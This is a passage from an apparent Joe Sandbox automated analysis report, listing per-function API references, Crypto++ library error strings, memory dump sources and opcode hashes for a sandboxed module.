                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: __cftoe$__mbstowcs_s_l
                                                                                                                                                                                                                                              • String ID: zX$P
                                                                                                                                                                                                                                              • API String ID: 1494777130-2079734279
                                                                                                                                                                                                                                              • Opcode ID: 23db8274ec05ea6b90d77bef144bf6346a289882e25eddf2a542282b2896248b
                                                                                                                                                                                                                                              • Instruction ID: bc9f767469b8897a1bc7a07cf98d36a14f9f360eb1de867f04511f8cd152e32a
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 23db8274ec05ea6b90d77bef144bf6346a289882e25eddf2a542282b2896248b
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7A910FB11187819FC376CF15C894BABBBF8AB88714F608A1DE19D4B280DB716645CF92
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CF089D0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 168COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • __CxxThrowException@8.LIBCMT ref: 6CF08ABB
                                                                                                                                                                                                                                              • __CxxThrowException@8.LIBCMT ref: 6CF08B82
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              • : invalid ciphertext, xrefs: 6CF08B48
                                                                                                                                                                                                                                              • PK_DefaultDecryptionFilter: ciphertext too long, xrefs: 6CF08A8E
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Exception@8Throw
                                                                                                                                                                                                                                              • String ID: : invalid ciphertext$PK_DefaultDecryptionFilter: ciphertext too long
                                                                                                                                                                                                                                              • API String ID: 2005118841-483996327
                                                                                                                                                                                                                                              • Opcode ID: 5e0a8670f9d68f4b8554caf8a0c1a0b7ce19a98cdf6d7fdf9016d549a542df9f
                                                                                                                                                                                                                                              • Instruction ID: b82d1b2daf2a95ba0253a13de3e3919796a445a1caa5a1de7c4a455ee1c3009b
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5e0a8670f9d68f4b8554caf8a0c1a0b7ce19a98cdf6d7fdf9016d549a542df9f
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0E514FB5204740AFD324CF54D890EABB7F8EF98704F108A1DE59A97B41DB31E909CB62
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CF06B00 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 161COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 6CED4010: std::_Xinvalid_argument.LIBCPMT ref: 6CED402A
                                                                                                                                                                                                                                              • __CxxThrowException@8.LIBCMT ref: 6CF06BA6
                                                                                                                                                                                                                                                • Part of subcall function 6CF3AC75: RaiseException.KERNEL32(?,?,6CF39C34,FF0C5935,?,?,?,?,6CF39C34,FF0C5935,6CF69C90,6CF7B974,FF0C5935), ref: 6CF3ACB7
                                                                                                                                                                                                                                                • Part of subcall function 6CED4010: std::_Xinvalid_argument.LIBCPMT ref: 6CED4067
                                                                                                                                                                                                                                                • Part of subcall function 6CED4010: _memmove.LIBCMT ref: 6CED40C8
                                                                                                                                                                                                                                              • __CxxThrowException@8.LIBCMT ref: 6CF06C56
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              • NullRNG: NullRNG should only be passed to functions that don't need to generate random bytes, xrefs: 6CF06B33
                                                                                                                                                                                                                                              • RandomNumberGenerator: IncorporateEntropy not implemented, xrefs: 6CF06BE3
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Exception@8ThrowXinvalid_argumentstd::_$ExceptionRaise_memmove
                                                                                                                                                                                                                                              • String ID: NullRNG: NullRNG should only be passed to functions that don't need to generate random bytes$RandomNumberGenerator: IncorporateEntropy not implemented
                                                                                                                                                                                                                                              • API String ID: 1902190269-184618050
                                                                                                                                                                                                                                              • Opcode ID: e2c0cfab63cbc18634b43cbb8c732faffafe9c7909dd156ed6beda96837f64ca
                                                                                                                                                                                                                                              • Instruction ID: ce10e04cb16c84e07b590aa2cb2e6015a91514ad2f53917b1398f7bd89de4c7c
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e2c0cfab63cbc18634b43cbb8c732faffafe9c7909dd156ed6beda96837f64ca
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1D511771218380AFC310CF69C890A5BBBF8BB99754F504A1EF59987B90D775D908CB92
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CED4E80 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 128COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 6CED4EFC
                                                                                                                                                                                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 6CED4F16
                                                                                                                                                                                                                                              • _memmove.LIBCMT ref: 6CED4F6C
                                                                                                                                                                                                                                                • Part of subcall function 6CED4D90: std::_Xinvalid_argument.LIBCPMT ref: 6CED4DA9
                                                                                                                                                                                                                                                • Part of subcall function 6CED4D90: std::_Xinvalid_argument.LIBCPMT ref: 6CED4DCA
                                                                                                                                                                                                                                                • Part of subcall function 6CED4D90: std::_Xinvalid_argument.LIBCPMT ref: 6CED4DE5
                                                                                                                                                                                                                                                • Part of subcall function 6CED4D90: _memmove.LIBCMT ref: 6CED4E4D
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Xinvalid_argumentstd::_$_memmove
                                                                                                                                                                                                                                              • String ID: string too long
                                                                                                                                                                                                                                              • API String ID: 2168136238-2556327735
                                                                                                                                                                                                                                              • Opcode ID: 820a2d57c57efb66a86c401944081e6ad67df26c8d66b93186ede773018b1536
                                                                                                                                                                                                                                              • Instruction ID: c9ab60683ddfd010e606ccf8951f6ffc52d17aa40e1fdf415d233fa63beef7fc
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 820a2d57c57efb66a86c401944081e6ad67df26c8d66b93186ede773018b1536
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6631E6323106105BD7259F5CE88096EF7FAEFE1724732892FE5558BF90C731A84687A2
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CED2090 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 116COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 6CED4010: std::_Xinvalid_argument.LIBCPMT ref: 6CED402A
                                                                                                                                                                                                                                              • __CxxThrowException@8.LIBCMT ref: 6CED211F
                                                                                                                                                                                                                                                • Part of subcall function 6CF3AC75: RaiseException.KERNEL32(?,?,6CF39C34,FF0C5935,?,?,?,?,6CF39C34,FF0C5935,6CF69C90,6CF7B974,FF0C5935), ref: 6CF3ACB7
                                                                                                                                                                                                                                                • Part of subcall function 6CED4010: std::_Xinvalid_argument.LIBCPMT ref: 6CED4067
                                                                                                                                                                                                                                                • Part of subcall function 6CED4010: _memmove.LIBCMT ref: 6CED40C8
                                                                                                                                                                                                                                              • __CxxThrowException@8.LIBCMT ref: 6CED21BF
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              • PK_MessageAccumulator: TruncatedFinal() should not be called, xrefs: 6CED215D
                                                                                                                                                                                                                                              • PK_MessageAccumulator: DigestSize() should not be called, xrefs: 6CED20BD
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Exception@8ThrowXinvalid_argumentstd::_$ExceptionRaise_memmove
                                                                                                                                                                                                                                              • String ID: PK_MessageAccumulator: DigestSize() should not be called$PK_MessageAccumulator: TruncatedFinal() should not be called
                                                                                                                                                                                                                                              • API String ID: 1902190269-1268710280
                                                                                                                                                                                                                                              • Opcode ID: 67550720fb3139debdaa4c8763503dcd390c6d66bf632a57373a9e788ed8e5fc
                                                                                                                                                                                                                                              • Instruction ID: bafe44cccc25ad71f4a4e304884580dab4cbefd9a9c1338dddf5097466545ce4
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 67550720fb3139debdaa4c8763503dcd390c6d66bf632a57373a9e788ed8e5fc
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 58414C70C0028CFFDB11DFE9D880ADDFBB8AB19314F50865AE521A7B90DB746A08CB50
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CED1D30 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 113COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 6CED4010: std::_Xinvalid_argument.LIBCPMT ref: 6CED402A
                                                                                                                                                                                                                                              • __CxxThrowException@8.LIBCMT ref: 6CED1DC9
                                                                                                                                                                                                                                                • Part of subcall function 6CF3AC75: RaiseException.KERNEL32(?,?,6CF39C34,FF0C5935,?,?,?,?,6CF39C34,FF0C5935,6CF69C90,6CF7B974,FF0C5935), ref: 6CF3ACB7
                                                                                                                                                                                                                                                • Part of subcall function 6CED4010: std::_Xinvalid_argument.LIBCPMT ref: 6CED4067
                                                                                                                                                                                                                                                • Part of subcall function 6CED4010: _memmove.LIBCMT ref: 6CED40C8
                                                                                                                                                                                                                                              • __CxxThrowException@8.LIBCMT ref: 6CED1E74
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              • BufferedTransformation: this object is not attachable, xrefs: 6CED1D67
                                                                                                                                                                                                                                              • CryptoMaterial: this object contains invalid values, xrefs: 6CED1E16
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Exception@8ThrowXinvalid_argumentstd::_$ExceptionRaise_memmove
                                                                                                                                                                                                                                              • String ID: BufferedTransformation: this object is not attachable$CryptoMaterial: this object contains invalid values
                                                                                                                                                                                                                                              • API String ID: 1902190269-3853263434
                                                                                                                                                                                                                                              • Opcode ID: 7a651c41a53ef87af5cd7cbe03418fe0f853ecbfc3991b840973c8483d305d26
                                                                                                                                                                                                                                              • Instruction ID: 5957fd31075cacc2af7f41a6bddbf3ac646e40dd3653e7c0078293ee7b66c826
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7a651c41a53ef87af5cd7cbe03418fe0f853ecbfc3991b840973c8483d305d26
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 48415F71C04248AFCB10CFE9D880BDDFBB8EB19314F50865AE425A7B90DB355A08CB90
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CF074C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 95COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 6CF2D820: _memmove.LIBCMT ref: 6CF2D930
                                                                                                                                                                                                                                                • Part of subcall function 6CED4010: std::_Xinvalid_argument.LIBCPMT ref: 6CED402A
                                                                                                                                                                                                                                              • __CxxThrowException@8.LIBCMT ref: 6CF0761A
                                                                                                                                                                                                                                                • Part of subcall function 6CF3AC75: RaiseException.KERNEL32(?,?,6CF39C34,FF0C5935,?,?,?,?,6CF39C34,FF0C5935,6CF69C90,6CF7B974,FF0C5935), ref: 6CF3ACB7
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ExceptionException@8RaiseThrowXinvalid_argument_memmovestd::_
                                                                                                                                                                                                                                              • String ID: byte digest to $ bytes$HashTransformation: can't truncate a
                                                                                                                                                                                                                                              • API String ID: 39012651-1139078987
                                                                                                                                                                                                                                              • Opcode ID: 75735ec141c69668aff96d1a7cf030be5782572809196eb1b3637515abec971a
                                                                                                                                                                                                                                              • Instruction ID: 35dee44c55d65905c37898ec35246117289e1e4a92e7b84760141b97582efecd
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 75735ec141c69668aff96d1a7cf030be5782572809196eb1b3637515abec971a
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E64172711083C0AFD331CB54C844FDBBBE8AB99714F104A1DE29997781DB7595088BA7
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CF0BEF0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 88COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 6CF0BF2D
                                                                                                                                                                                                                                                • Part of subcall function 6CF390D8: std::exception::exception.LIBCMT ref: 6CF390ED
                                                                                                                                                                                                                                                • Part of subcall function 6CF390D8: __CxxThrowException@8.LIBCMT ref: 6CF39102
                                                                                                                                                                                                                                                • Part of subcall function 6CF390D8: std::exception::exception.LIBCMT ref: 6CF39113
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
                                                                                                                                                                                                                                              • String ID: gfff$gfff$vector<T> too long
                                                                                                                                                                                                                                              • API String ID: 1823113695-3369487235
                                                                                                                                                                                                                                              • Opcode ID: 6635e270312f7984c34559fe949fcf24c586cde6b2c85e247ea4bddc8228d328
                                                                                                                                                                                                                                              • Instruction ID: 8958f7c0d6f3c9b3e4a77b8e504baac441954bdb7fb18d1a26ac30217b4c1147
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6635e270312f7984c34559fe949fcf24c586cde6b2c85e247ea4bddc8228d328
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6231CAB1A006059FC718CF59D990E6AF7F9EB48704F148A2DE559DB780DB31B904CB91
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CF38E40 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 68COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • QueryPerformanceFrequency.KERNEL32(FF0C5935,FF0C5935), ref: 6CF38E7F
                                                                                                                                                                                                                                              • GetLastError.KERNEL32(0000000A), ref: 6CF38E8F
                                                                                                                                                                                                                                                • Part of subcall function 6CED4010: std::_Xinvalid_argument.LIBCPMT ref: 6CED402A
                                                                                                                                                                                                                                              • __CxxThrowException@8.LIBCMT ref: 6CF38F14
                                                                                                                                                                                                                                                • Part of subcall function 6CF3AC75: RaiseException.KERNEL32(?,?,6CF39C34,FF0C5935,?,?,?,?,6CF39C34,FF0C5935,6CF69C90,6CF7B974,FF0C5935), ref: 6CF3ACB7
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              • Timer: QueryPerformanceFrequency failed with error , xrefs: 6CF38EA5
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ErrorExceptionException@8FrequencyLastPerformanceQueryRaiseThrowXinvalid_argumentstd::_
                                                                                                                                                                                                                                              • String ID: Timer: QueryPerformanceFrequency failed with error
                                                                                                                                                                                                                                              • API String ID: 2175244869-348333943
                                                                                                                                                                                                                                              • Opcode ID: 14c305ff0200096d72a63603f430e27d4f6520f06479f0b561d771363857ce18
                                                                                                                                                                                                                                              • Instruction ID: e93950d1622ed90ebf271063b718ccf5e400952f81c0d1b5dc85a4946bd0e0fe
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 14c305ff0200096d72a63603f430e27d4f6520f06479f0b561d771363857ce18
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 70211BB1508380AFD350CF24C841B9BBBE8FB99654F508E1EF5A987681DB7595088BA3
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CF38F40 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 68COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • QueryPerformanceCounter.KERNEL32(FF0C5935,FF0C5935,?,00000000), ref: 6CF38F7F
